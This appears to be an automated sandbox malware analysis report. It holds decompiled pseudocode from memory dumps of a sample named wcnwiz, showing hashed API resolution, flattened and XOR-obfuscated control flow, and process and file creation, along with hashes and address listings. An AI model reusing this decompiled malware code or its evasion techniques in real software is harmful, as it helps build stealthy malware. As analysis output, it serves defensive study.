                                                        0x003b382d
                                                        0x003b3832
                                                        0x003b3845
                                                        0x003b384a
                                                        0x003b384a
                                                        0x003b3855
                                                        0x003b3857
                                                        0x003b385e
                                                        0x003b3871
                                                        0x003b3876
                                                        0x003b3876
                                                        0x003b3884
                                                        0x003b388a
                                                        0x003b3892
                                                        0x003b389d
                                                        0x003b38a6
                                                        0x003b38b4
                                                        0x003b38cc
                                                        0x003b38cc
                                                        0x003b38d5
                                                        0x003b38d9
                                                        0x003b38e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: 6c1d08b15bc44f06436343978d2fc1aa87af0c7123f941638ab2a1c9b9152f51
                                                        • Instruction ID: 3b72652807e9ca7ac2b81dc85fae701325e96f2192bff724da29d98f9bb782a7
                                                        • Opcode Fuzzy Hash: 6c1d08b15bc44f06436343978d2fc1aa87af0c7123f941638ab2a1c9b9152f51
                                                        • Instruction Fuzzy Hash: D531BC757002614BD716ABB9DC11BEB37EAAB8470CF000A2DBA55CB291FA34DA058791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 3b4b70-3b4b80 344 3b4b9d-3b4bba 343->344 345 3b4b82-3b4b98 call 3b3f00 call 3b3e60 343->345 350 3b4bbc-3b4bd2 call 3b3f00 call 3b3e60 344->350 351 3b4bd7-3b4bf5 CreateProcessW 344->351 345->344 350->351 352 3b4c73-3b4c7a 351->352 353 3b4bf7-3b4bfd 351->353 356 3b4bff-3b4c13 353->356 357 3b4c14-3b4c1b 353->357 359 3b4c38-3b4c45 357->359 360 3b4c1d-3b4c33 call 3b3f00 call 3b3e60 357->360 367 3b4c62-3b4c72 359->367 368 3b4c47-3b4c5d call 3b3f00 call 3b3e60 359->368 360->359 368->367
                                                        C-Code - Quality: 60%
                                                        			E003B4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x3bddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E003B3E60(__ebx, E003B3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x3bddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x3be21c == 0) {
                                                        					 *0x3be21c = E003B3E60(_t26, E003B3F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x3bde3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E003B3E60(_t26, E003B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3bde3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x3bde3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E003B3E60(_t26, E003B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x3bde3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x003b4b70
                                                        0x003b4b70
                                                        0x003b4b70
                                                        0x003b4b79
                                                        0x003b4b7c
                                                        0x003b4b80
                                                        0x003b4b93
                                                        0x003b4b98
                                                        0x003b4b98
                                                        0x003b4ba6
                                                        0x003b4bb0
                                                        0x003b4bba
                                                        0x003b4bd2
                                                        0x003b4bd2
                                                        0x003b4bf1
                                                        0x003b4bf5
                                                        0x003b4c7a
                                                        0x003b4bf7
                                                        0x003b4bfd
                                                        0x003b4c14
                                                        0x003b4c1b
                                                        0x003b4c2e
                                                        0x003b4c33
                                                        0x003b4c33
                                                        0x003b4c3c
                                                        0x003b4c3e
                                                        0x003b4c45
                                                        0x003b4c58
                                                        0x003b4c5d
                                                        0x003b4c5d
                                                        0x003b4c66
                                                        0x003b4c72
                                                        0x003b4bff
                                                        0x003b4bff
                                                        0x003b4c05
                                                        0x003b4c13
                                                        0x003b4c13
                                                        0x003b4bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 003B4BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: 3ca35c8a629cf3e18dccd908fc2d42b58e8644b38627d1c0fa0530dd49272a9d
                                                        • Instruction ID: fcdd1c21e5cc56a01715304e64355f94679110e4d02763c3d6f17c98453e16e3
                                                        • Opcode Fuzzy Hash: 3ca35c8a629cf3e18dccd908fc2d42b58e8644b38627d1c0fa0530dd49272a9d
                                                        • Instruction Fuzzy Hash: 2121DB357002111BEB16AB7ACC51BFB3BAAABD0B08F00452DB754CF6A1FA70DA008785
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 3b80a0-3b815b 376 3b8163-3b8168 375->376 377 3b8170-3b8175 376->377 378 3b817b 377->378 379 3b8338-3b833d 377->379 380 3b8181-3b8186 378->380 381 3b8287-3b829b call 3b34c0 378->381 382 3b836f-3b8377 379->382 383 3b833f-3b8344 379->383 387 3b818c-3b8191 380->387 388 3b8252-3b8259 380->388 404 3b82bb-3b82e3 381->404 405 3b829d-3b82b5 call 3b3f00 call 3b3e60 381->405 385 3b8379-3b8391 call 3b3f00 call 3b3e60 382->385 386 3b8397-3b83bb CreateFileW 382->386 389 3b8346-3b834b 383->389 390 3b8365-3b836a 383->390 385->386 395 3b83ee-3b83fa 386->395 396 3b83bd-3b83c2 386->396 399 3b81e3-3b821a 387->399 400 3b8193-3b8198 387->400 397 3b825b-3b8271 call 3b3f00 call 3b3e60 388->397 398 3b8276-3b8282 388->398 391 3b834d-3b8352 389->391 392 3b83c7-3b83ce 389->392 390->377 391->377 401 3b8358-3b8364 391->401 408 3b83eb 392->408 409 3b83d0-3b83e6 call 3b3f00 call 3b3e60 392->409 396->377 397->398 398->377 402 3b821c-3b8232 call 3b3f00 call 3b3e60 399->402 403 3b8237-3b824d 399->403 400->391 410 3b819e-3b81e1 call 3bb6e0 400->410 402->403 403->377 428 3b8300-3b830b 404->428 429 3b82e5-3b82fb call 3b3f00 call 3b3e60 404->429 405->404 408->395 409->408 410->377 439 3b8328-3b8333 428->439 440 3b830d-3b8323 call 3b3f00 call 3b3e60 428->440 429->428 439->376 440->439
                                                        C-Code - Quality: 66%
                                                        			E003B80A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t72;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t87;
                                                        				intOrPtr _t88;
                                                        				intOrPtr* _t89;
                                                        				void* _t91;
                                                        				void* _t95;
                                                        				intOrPtr _t100;
                                                        				char _t104;
                                                        				signed int _t121;
                                                        				void* _t124;
                                                        				void* _t126;
                                                        				void* _t127;
                                                        				signed int* _t128;
                                                        				void* _t130;
                                                        
                                                        				_t121 = __edx;
                                                        				_t128 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t127 = _v584;
                                                        				_t95 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t130 = _t58 - 0xea5411f;
                                                        							if(_t130 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t130 == 0) {
                                                        								_t72 = E003B34C0(0x3bd970);
                                                        								_t121 =  *0x3be158;
                                                        								_t126 = _t72;
                                                        								if(_t121 == 0) {
                                                        									_t121 = E003B3E60(_t95, E003B3F00(0xc6fbcd74), 0xba71dd03, _t127);
                                                        									 *0x3be158 = _t121;
                                                        								}
                                                        								_t100 =  *0x3be54c; // 0x51e730
                                                        								_t50 = _t100 + 0x260; // 0x51e990
                                                        								_t51 = _t100 + 0x18; // 0x51e748
                                                        								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
                                                        								_t77 =  *0x3be494;
                                                        								_t128 =  &(_t128[5]);
                                                        								if(_t77 == 0) {
                                                        									_t82 = E003B3F00(0x9bab0b12);
                                                        									_t121 = 0x7facde30;
                                                        									_t77 = E003B3E60(_t95, _t82, 0x7facde30, _t127);
                                                        									 *0x3be494 = _t77;
                                                        								}
                                                        								_t124 =  *_t77();
                                                        								_t79 =  *0x3bdf30;
                                                        								if(_t79 == 0) {
                                                        									_t81 = E003B3F00(0x9bab0b12);
                                                        									_t121 = 0x5010a54d;
                                                        									_t79 = E003B3E60(_t95, _t81, 0x5010a54d, _t127);
                                                        									 *0x3bdf30 = _t79;
                                                        								}
                                                        								 *_t79(_t124, 0, _t126);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t85 =  *0x3be1d4;
                                                        									if(_t85 == 0) {
                                                        										_t87 = E003B3F00(0x9bab0b12);
                                                        										_t121 = 0xa229df38;
                                                        										_t85 = E003B3E60(_t95, _t87, 0xa229df38, _t127);
                                                        										 *0x3be1d4 = _t85;
                                                        									}
                                                        									 *_t85( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t88 = _v568;
                                                        										_t104 = _v572;
                                                        										_v560 = _t88;
                                                        										_v552 = _t88;
                                                        										_v544 = _t88;
                                                        										_v536 = _t88;
                                                        										_t89 =  *0x3bdee4;
                                                        										_v564 = _t104;
                                                        										_v556 = _t104;
                                                        										_v548 = _t104;
                                                        										_v540 = _t104;
                                                        										_v532 = 0;
                                                        										if(_t89 == 0) {
                                                        											_t91 = E003B3F00(0x9bab0b12);
                                                        											_t121 = 0x4bf45878;
                                                        											_t89 = E003B3E60(_t95, _t91, 0x4bf45878, _t127);
                                                        											 *0x3bdee4 = _t89;
                                                        										}
                                                        										 *_t89(_t127, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t95 =  !=  ? 1 : _t95;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E003BB6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t121;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x3bde04 == 0) {
                                                        								_t66 = E003B3F00(0x9bab0b12);
                                                        								_t121 = 0xb66d748a;
                                                        								 *0x3bde04 = E003B3E60(_t95, _t66, 0xb66d748a, _t127);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t127 = _t64;
                                                        							if(_t127 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									_t68 =  *0x3bde3c;
                                                        									if(_t68 == 0) {
                                                        										_t68 = E003B3E60(_t95, E003B3F00(0x9bab0b12), 0x20de7595, _t127);
                                                        										 *0x3bde3c = _t68;
                                                        									}
                                                        									 *_t68(_t127);
                                                        									L34:
                                                        									return _t95;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t95;
                                                        					goto L35;
                                                        				}
                                                        			}














































                                                        0x003b80a0
                                                        0x003b80a0
                                                        0x003b80a6
                                                        0x003b80ae
                                                        0x003b80b3
                                                        0x003b80bb
                                                        0x003b80c3
                                                        0x003b80ca
                                                        0x003b80ce
                                                        0x003b80d2
                                                        0x003b80d9
                                                        0x003b80e0
                                                        0x003b80e7
                                                        0x003b80ee
                                                        0x003b80f5
                                                        0x003b80fc
                                                        0x003b8103
                                                        0x003b8112
                                                        0x003b8116
                                                        0x003b8119
                                                        0x003b811d
                                                        0x003b8125
                                                        0x003b8133
                                                        0x003b8137
                                                        0x003b813f
                                                        0x003b8147
                                                        0x003b814f
                                                        0x003b8153
                                                        0x003b815b
                                                        0x003b8163
                                                        0x003b8163
                                                        0x003b8168
                                                        0x003b8170
                                                        0x003b8170
                                                        0x003b8170
                                                        0x003b8170
                                                        0x003b8175
                                                        0x00000000
                                                        0x00000000
                                                        0x003b817b
                                                        0x003b828c
                                                        0x003b8291
                                                        0x003b8297
                                                        0x003b829b
                                                        0x003b82b3
                                                        0x003b82b5
                                                        0x003b82b5
                                                        0x003b82bb
                                                        0x003b82c1
                                                        0x003b82c8
                                                        0x003b82d7
                                                        0x003b82d9
                                                        0x003b82de
                                                        0x003b82e3
                                                        0x003b82ea
                                                        0x003b82ef
                                                        0x003b82f6
                                                        0x003b82fb
                                                        0x003b82fb
                                                        0x003b8302
                                                        0x003b8304
                                                        0x003b830b
                                                        0x003b8312
                                                        0x003b8317
                                                        0x003b831e
                                                        0x003b8323
                                                        0x003b8323
                                                        0x003b832c
                                                        0x003b832e
                                                        0x00000000
                                                        0x003b8181
                                                        0x003b8186
                                                        0x003b8252
                                                        0x003b8259
                                                        0x003b8260
                                                        0x003b8265
                                                        0x003b826c
                                                        0x003b8271
                                                        0x003b8271
                                                        0x003b827b
                                                        0x003b827d
                                                        0x00000000
                                                        0x003b818c
                                                        0x003b8191
                                                        0x003b81e3
                                                        0x003b81e7
                                                        0x003b81eb
                                                        0x003b81ef
                                                        0x003b81f3
                                                        0x003b81f7
                                                        0x003b81fb
                                                        0x003b8200
                                                        0x003b8204
                                                        0x003b8208
                                                        0x003b820c
                                                        0x003b8210
                                                        0x003b821a
                                                        0x003b8221
                                                        0x003b8226
                                                        0x003b822d
                                                        0x003b8232
                                                        0x003b8232
                                                        0x003b8241
                                                        0x003b8245
                                                        0x003b824a
                                                        0x00000000
                                                        0x003b8193
                                                        0x003b8198
                                                        0x00000000
                                                        0x003b819e
                                                        0x003b81a0
                                                        0x003b81a8
                                                        0x003b81c4
                                                        0x003b81c8
                                                        0x003b81d4
                                                        0x003b81d8
                                                        0x003b81dd
                                                        0x00000000
                                                        0x003b81dd
                                                        0x003b8198
                                                        0x003b8191
                                                        0x003b8186
                                                        0x00000000
                                                        0x003b817b
                                                        0x003b833d
                                                        0x003b8377
                                                        0x003b837e
                                                        0x003b8383
                                                        0x003b8391
                                                        0x003b8391
                                                        0x003b83b4
                                                        0x003b83b6
                                                        0x003b83bb
                                                        0x00000000
                                                        0x003b83bd
                                                        0x003b83bd
                                                        0x00000000
                                                        0x003b83bd
                                                        0x003b833f
                                                        0x003b8344
                                                        0x003b8365
                                                        0x00000000
                                                        0x003b8346
                                                        0x003b834b
                                                        0x003b83c7
                                                        0x003b83ce
                                                        0x003b83e1
                                                        0x003b83e6
                                                        0x003b83e6
                                                        0x003b83ec
                                                        0x003b83f1
                                                        0x003b83fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003b834b
                                                        0x003b8344
                                                        0x00000000
                                                        0x003b834d
                                                        0x003b834d
                                                        0x003b8364
                                                        0x00000000
                                                        0x003b8364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003B83B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: 0Q
                                                        • API String ID: 823142352-1780094543
                                                        • Opcode ID: 468df79154c71fc981e15e41f887b592c9748624c797d9420490dc4c49058517
                                                        • Instruction ID: 5ef0a21f78b09f957648856a1e17a03a30ff9bdaf4e2c491c76c7ecbb37d94ec
                                                        • Opcode Fuzzy Hash: 468df79154c71fc981e15e41f887b592c9748624c797d9420490dc4c49058517
                                                        • Instruction Fuzzy Hash: 1681BD756083018FD71ADF68C8546ABB7EDAB9475CF10092EF289CB690EB74DE01CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 529 3b30a0-3b30b6 530 3b30ba-3b30bf 529->530 531 3b30c0-3b30c5 530->531 532 3b30cb 531->532 533 3b3201-3b3206 531->533 534 3b31ed-3b31f1 532->534 535 3b30d1-3b30d6 532->535 536 3b3208-3b320d 533->536 537 3b3245-3b324c 533->537 540 3b31f7-3b31fc 534->540 541 3b32f6-3b3300 534->541 542 3b31da-3b31e8 535->542 543 3b30dc-3b30e1 535->543 544 3b32ab-3b32b3 536->544 545 3b3213-3b3218 536->545 538 3b3269-3b3274 537->538 539 3b324e-3b3264 call 3b3f00 call 3b3e60 537->539 564 3b3291-3b329f RtlAllocateHeap 538->564 565 3b3276-3b328c call 3b3f00 call 3b3e60 538->565 539->538 540->531 542->531 549 3b31a0-3b31a8 543->549 550 3b30e7-3b30ec 543->550 546 3b32d3-3b32f3 544->546 547 3b32b5-3b32cd call 3b3f00 call 3b3e60 544->547 551 3b321a-3b3228 call 3b3d00 545->551 552 3b322d-3b3232 545->552 546->541 547->546 558 3b31aa-3b31c2 call 3b3f00 call 3b3e60 549->558 559 3b31c8-3b31d5 549->559 550->552 556 3b30f2-3b319b 550->556 551->530 552->531 560 3b3238-3b3242 552->560 556->530 558->559 559->530 564->541 572 3b32a1-3b32a6 564->572 565->564 572->530
                                                        C-Code - Quality: 71%
                                                        			E003B30A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x3be1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E003B3E60(_t93, E003B3F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x3be1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x3be494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E003B3E60(_t93, E003B3F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x3be494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x3bdd18 == 0) {
                                                        								 *0x3bdd18 = E003B3E60(_t93, E003B3F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x3be43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E003B3E60(_t93, E003B3F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x3be43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E003B3D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x003b30a2
                                                        0x003b30a6
                                                        0x003b30ac
                                                        0x003b30b1
                                                        0x003b30b6
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x003b30c0
                                                        0x003b30c0
                                                        0x003b30c0
                                                        0x003b30c0
                                                        0x003b30c5
                                                        0x00000000
                                                        0x00000000
                                                        0x003b30cb
                                                        0x003b31f1
                                                        0x003b32f9
                                                        0x003b3300
                                                        0x003b31f7
                                                        0x003b31f7
                                                        0x00000000
                                                        0x003b31f7
                                                        0x003b30d1
                                                        0x003b30d6
                                                        0x003b31e5
                                                        0x00000000
                                                        0x003b30dc
                                                        0x003b30e1
                                                        0x003b31a0
                                                        0x003b31a8
                                                        0x003b31c0
                                                        0x003b31c2
                                                        0x003b31c2
                                                        0x003b31ce
                                                        0x003b31d0
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x00000000
                                                        0x003b30ba
                                                        0x003b30e7
                                                        0x003b30ec
                                                        0x00000000
                                                        0x003b30f2
                                                        0x003b30f2
                                                        0x003b310d
                                                        0x003b3111
                                                        0x003b311f
                                                        0x003b3123
                                                        0x003b3130
                                                        0x003b3139
                                                        0x003b3147
                                                        0x003b314b
                                                        0x003b3153
                                                        0x003b315b
                                                        0x003b3175
                                                        0x003b317f
                                                        0x003b3187
                                                        0x003b318b
                                                        0x003b3193
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x00000000
                                                        0x003b30ba
                                                        0x003b30ba
                                                        0x003b30ec
                                                        0x003b30e1
                                                        0x003b30d6
                                                        0x00000000
                                                        0x003b30cb
                                                        0x003b3206
                                                        0x003b3245
                                                        0x003b324c
                                                        0x003b325f
                                                        0x003b3264
                                                        0x003b3264
                                                        0x003b326b
                                                        0x003b3274
                                                        0x003b328c
                                                        0x003b328c
                                                        0x003b3299
                                                        0x003b329b
                                                        0x003b329f
                                                        0x00000000
                                                        0x003b32a1
                                                        0x003b32a1
                                                        0x00000000
                                                        0x003b32a1
                                                        0x003b3208
                                                        0x003b320d
                                                        0x003b32ab
                                                        0x003b32b3
                                                        0x003b32cb
                                                        0x003b32cd
                                                        0x003b32cd
                                                        0x003b32e4
                                                        0x003b32e6
                                                        0x003b32ed
                                                        0x003b32f0
                                                        0x003b32f3
                                                        0x00000000
                                                        0x003b3213
                                                        0x003b3218
                                                        0x00000000
                                                        0x003b321a
